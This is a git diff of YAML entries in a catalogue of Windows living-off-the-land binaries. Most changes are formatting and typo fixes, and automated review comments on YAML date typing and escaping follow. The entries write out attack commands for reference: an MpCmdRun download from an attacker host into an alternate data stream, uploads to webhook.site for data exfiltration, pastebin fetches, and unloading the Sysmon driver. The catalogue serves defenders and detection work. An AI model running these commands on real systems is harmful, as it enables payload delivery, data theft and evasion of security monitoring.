diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index ef362a1..6c24632 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -2,7 +2,7 @@ Name: AppInstaller.exe Description: Tool used for installation of AppX/MSIX applications on Windows 10 Author: 'Wade Hickey' -Created: '2020-12-02' +Created: 2020-12-02 Commands: - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index feb81ea..b0f2d8a 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: ATBroker.exe /start malware Description: Start a registered Assistive Technology (AT). - Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. + Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry. Category: Execute Privileges: User MitreID: T1218 diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index ac47b2f..2f8be4c 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml 
@@ -2,7 +2,7 @@ Name: cmdl32.exe Description: Microsoft Connection Manager Auto-Download Author: 'Elliot Killick' -Created: '2021-08-26' +Created: 2021-08-26 Commands: - Command: cmdl32 /vpn /lan %cd%\config Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter. diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index bd739c3..1991f85 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -4,7 +4,7 @@ Description: Binary part of Windows Defender. Used to manage settings in Windows Author: 'Ialle Teixeira' Created: 2020-09-04 Commands: - - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile + - Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml index e5d5c20..37a1028 100644 --- a/yml/OSBinaries/DataSvcUtil.yml +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -2,9 +2,9 @@ Name: DataSvcUtil.exe Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. Author: 'Ialle Teixeira' -Created: '01/12/2020' +Created: 2020-12-01 Commands: - - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile + - Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload 
diff --git a/yml/OSBinaries/Dllhost.yml b/yml/OSBinaries/Dllhost.yml index beda52f..7dc777c 100644 --- a/yml/OSBinaries/Dllhost.yml +++ b/yml/OSBinaries/Dllhost.yml @@ -2,7 +2,7 @@ Name: Dllhost.exe Description: Used by Windows to DLL Surrogate COM Objects Author: 'Nasreddine Bencherchali' -Created: '2020-11-07' +Created: 2020-11-07 Commands: - Command: dllhost.exe /Processid:{CLSID} Description: Use dllhost.exe to load a registered or hijacked COM Server payload. diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml index 45eebef..f439bbd 100644 --- a/yml/OSBinaries/FltMC.yml +++ b/yml/OSBinaries/FltMC.yml @@ -2,7 +2,7 @@ Name: fltMC.exe Description: Filter Manager Control Program used by Windows Author: 'John Lambert' -Created: '2021-09-18' +Created: 2021-09-18 Commands: - Command: fltMC.exe unload SysmonDrv Description: Unloads a driver used by security agents diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index d39d734..ab11f79 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -2,7 +2,7 @@ Name: IMEWDBLD.exe Description: Microsoft IME Open Extended Dictionary Module Author: 'Wade Hickey' -Created: '2020-03-05' +Created: 2020-03-05 Commands: - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 33ac149..10b5fa4 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml 
@@ -18,7 +18,7 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10 - - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe + - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe Description: Download file to machine and store it in Alternate Data Stream Usecase: Hide downloaded data inton an Alternate Data Stream Category: ADS diff --git a/yml/OSBinaries/OfflineScannerShell.yml b/yml/OSBinaries/OfflineScannerShell.yml index 966fe84..a400cc1 100644 --- a/yml/OSBinaries/OfflineScannerShell.yml +++ b/yml/OSBinaries/OfflineScannerShell.yml @@ -2,7 +2,7 @@ Name: OfflineScannerShell.exe Description: Windows Defender Offline Shell Author: 'Elliot Killick' -Created: '2021-08-16' +Created: 2021-08-16 Commands: - Command: OfflineScannerShell Description: Execute mpclient.dll library in the current working directory diff --git a/yml/OSBinaries/OneDriveStandaloneUpdater.yml b/yml/OSBinaries/OneDriveStandaloneUpdater.yml index b61a6e8..8c69fcb 100644 --- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml +++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml @@ -2,7 +2,7 @@ Name: OneDriveStandaloneUpdater.exe Description: OneDrive Standalone Updater Author: 'Elliot Killick' -Created: '2021-08-22' +Created: 2021-08-22 Commands: - Command: OneDriveStandaloneUpdater Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json 
diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index 033961e..c39d6ce 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -2,7 +2,7 @@ Name: PrintBrm.exe Description: Printer Migration Command-Line Tool Author: 'Elliot Killick' -Created: '2021-06-21' +Created: 2021-06-21 Commands: - Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip Description: Create a ZIP file from a folder in a remote drive diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index e171778..6c4d9fe 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -2,7 +2,7 @@ Name: SettingSyncHost.exe Description: Host Process for Setting Synchronization Author: 'Elliot Killick' -Created: '2021-08-26' +Created: 2021-08-26 Commands: - Command: SettingSyncHost -LoadAndRunDiagScript anything Description: Execute file specified in %COMSPEC% diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index fdd8ef0..7f686cf 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -2,7 +2,7 @@ Name: Stordiag.exe Description: Storage diagnostic tool Author: 'Eral4m' -Created: '2021-10-21' +Created: 2021-10-21 Commands: - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 00b3f33..f13d7ac 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -2,7 +2,7 @@ Name: WorkFolders.exe Description: Work Folders Author: 'Elliot Killick' -Created: '2021-08-16' +Created: 2021-08-16 Commands: - Command: WorkFolders Description: Execute control.exe in the current working directory 
diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 34f939d..ba04167 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -2,7 +2,7 @@ Name: Ieaframe.dll Description: Internet Browser DLL for translating HTML code. Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 4295dd3..02264de 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -2,7 +2,7 @@ Name: Setupapi.dll Description: Windows Setup Application Programming Interface Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. UseCase: Load an executable payload. Category: Execute diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 8a8dccd..f344462 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml 
@@ -1,12 +1,12 @@ --- Name: Shdocvw.dll Description: Shell Doc Object and Control Library. -Author: +Author: Jimmy (@bohops) Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 5a55cf1..3f8748e 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -4,7 +4,7 @@ Description: Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 + - Command: . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. Usecase: Proxy execution Category: Execute diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 6610eb1..9bfebcb 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml 
@@ -4,7 +4,7 @@ Description: Aero diagnostics script Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke [args] + - Command: . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke [args] Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. Usecase: Proxy execution Category: Execute diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 65cbb04..9d851cf 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -2,7 +2,7 @@ Name: Procdump(64).exe Description: SysInternals Memory Dump Tool Author: 'Alfie Champion (@ajpc500)' -Created: '2020-10-14' +Created: 2020-10-14 Commands: - Command: procdump.exe -md calc.dll explorer.exe Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 3b5d330..38c1052 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -2,7 +2,7 @@ Name: VSIISExeLauncher.exe Description: Binary will execute specified binary. Part of VS/VScode installation. Author: 'timwhite' -Created: '2021-09-24' +Created: 2021-09-24 Commands: - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here" Description: The above binary will execute other binary.
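Review bot: in the AppInstaller.yml hunk, unquoting `Created: 2020-12-02` changes the value's YAML type, not only its formatting: a plain `YYYY-MM-DD` scalar matches the YAML 1.1 timestamp pattern, so PyYAML's `safe_load` returns a `datetime.date` instead of the string `'2020-12-02'`, and any consumer that treats `Created` as a string (sorting, template rendering, JSON output) can break. The same point applies to every other `-Created: '...'` / `+Created: ...` hunk in this patch (Cmdl32, Dllhost, FltMC, IMEWDBLD, OfflineScannerShell, OneDriveStandaloneUpdater, PrintBrm, SettingSyncHost, Stordiag, WorkFolders, Ieframe, Setupapi, Procdump, VSIISExeLauncher). If the goal is to match the already-unquoted entries (Atbroker, ConfigSecurityPolicy, Shdocvw), confirm the site generator accepts date objects; otherwise normalise in the other direction and keep the quotes.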
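Review bot: in the DataSvcUtil.yml hunk, `-Created: '01/12/2020'` to `+Created: 2020-12-01` silently picks a DD/MM/YYYY reading; the original is ambiguous and is equally 12 January 2020 under MM/DD/YYYY. Confirm the intended date against the file's git history or the entry's author before committing to 1 December 2020.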
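Review bot: the ConfigSecurityPolicy.yml hunk's backslash change is correct for a YAML plain scalar, where backslash is not an escape character, so `C:\\Windows\\System32\\calc.exe` previously loaded as a literal doubled backslash and rendered a path that does not resolve. The commit message should state that this only holds while `Command:` values stay plain or single-quoted; if someone later wraps one in double quotes, the single backslashes become escape sequences again. The same reasoning covers the DataSvcUtil, MpCmdRun and second Setupapi `Command:` hunks.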
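Review bot: in the MpCmdRun.yml hunk, the unchanged context line `Usecase: Hide downloaded data inton an Alternate Data Stream` carries a typo (`inton` should be `into`) directly beneath the line being changed; fix it in the same commit so the file does not need a second cosmetic pass.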
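Review bot: the Ieframe.yml hunk only unquotes the date and leaves two visible problems in its context: `Name: Ieaframe.dll` does not match the filename `Ieframe.yml` or the `ieframe.dll` in the `Command:` line, and `Author:` is empty. The Shdocvw hunk in this same patch fills in a missing `Author:`, so the same treatment belongs here, and the `Name:` typo will mislead anyone searching the corpus for the library by name.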
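Review bot: in the second Setupapi.yml hunk, the context line `UseCase: Load an executable payload.` spells the key `UseCase`, while every other entry in this patch uses `Usecase`; a consumer reading `entry['Usecase']` gets a missing key for this command. Since the hunk already touches this command block, rename the key in the same change.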
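Review bot: two points on the Shdocvw.yml hunk. The `Usecase:` line is removed and re-added with identical visible text, which points to a trailing-whitespace or line-ending change; harmless, but confirm it, since it inflates the diff. The new `Author: Jimmy (@bohops)` is unquoted while every other `Author:` in the patch is single-quoted (`'Wade Hickey'`); the parenthesised handle is fine for a YAML parser, but quoting keeps the files uniform. The `a(n) URL` wording fixed here still appears in the Ieframe entry's `Description:`.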
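Review bot: in the CL_mutexverifiers.yml hunk, the `\n` in `CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1` survives this change as the two literal characters backslash and `n`, because a plain YAML scalar does no escape processing (the same property that makes the `\\` to `\` path fix correct). If the rendered page is meant to show two lines, either the site generator must translate `\n` itself, or the value should become a block scalar (`Command: |` followed by the two lines), which needs no escaping at all. The Cl_invocation hunk has the same issue.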